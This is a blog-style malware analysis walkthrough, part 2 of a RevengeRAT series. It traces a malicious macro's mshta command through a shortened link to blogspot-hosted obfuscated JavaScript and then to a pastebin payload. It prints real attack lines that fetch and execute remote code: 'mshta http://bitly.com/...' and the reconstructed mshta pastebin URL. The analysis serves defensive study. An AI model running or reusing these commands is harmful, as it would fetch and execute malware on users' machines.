RevengeRAT (Part 2) – Pastebin, Javascript, and StrReverse(StrReverse(“stuff”))

Continuing our walk-through, we now get outside of the document itself and see what happens next.

Part 1: Getting through the macros.

Part 2: Analysis of javascript from blogspot site to the first pastebin page.

Part 3: Analysis of javascript on remaining pastebin pages.


We left off with the macro running this command:

mshta http://bitly.com/6hjxasxsxassh6

This means we must know what happens next. Using whatever site/mechanism you use to expand shortened links, you will see that the URL takes you to a blogspot site of all things.

https://sxasxasxssaxxsasxasx.blogspot.com/p/don-bigi.html

Having seen this sort of behavior before, I’m not going to actually visit the site. Remember, our goal is to learn what is happening purposefully, rather than learning what is happening accidentally. In this case, I’m pretty sure that the site contains a monstrous chunk of javascript that I don’t want running. This means I’m going to use powershell to download the website. From there I can investigate it at my leisure.

PS C:\path\to\wherever> Invoke-WebRequest -Uri "https://sxasxasxssaxxsasxasx.blogspot.com/p/don-bigi.html" -OutFile "C:\Path\to\wherever\site.html"

Full disclosure, I can neither write nor read html. However, I have learned that huge chunks of javascript like this are suspicious and deserve more attention.

tesla06.PNG

I found CyberChef to be extremely handy when working with this. We can copy out the hex in the javascript command and make use of the “From Hex” recipe.

tesla07.PNG

Looking at the output below, we can see more javascript? Yes, we will find that we have multiple layers of obfuscated javascript. This means we need to take the hex from the output, copy it to the input, and lather, rinse, and repeat until we get something useful like this:

tesla08.PNG

Lines 8-9 contain the last two rounds of obfuscated javascript. Lines 10-20 contain what is actually going to run. Looking carefully at line 11 we see the infamous double StrReverse.

(sigh)

Anyway, line 15 (var Zwk) is where the string gets put together. Line 18 (var AS_ww) contains the completed string and is where it is executed. After a little bit of analysis you can see this command being run:

12. AS_ww1 = http://www.pastebin.com/raw/
13. AS_ww0 = mshta
14. AS_ww2 = qykTeRnR
17. AS_ww = http://www.pastebin.com/raw/qykTeRnR

So download what’s on pastebin and execute it? Looks like we’re headed to pastebin!

tesla09.PNG

More javascript… Alrighty. Back to CyberChef and about three rounds later we get:

tesla10.PNG

This script is split up into four distinct parts. We’ll look at each of them in turn in the next post.

To part 3!

2 thoughts on “RevengeRAT (Part 2) – Pastebin, Javascript, and StrReverse(StrReverse(“stuff”))

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s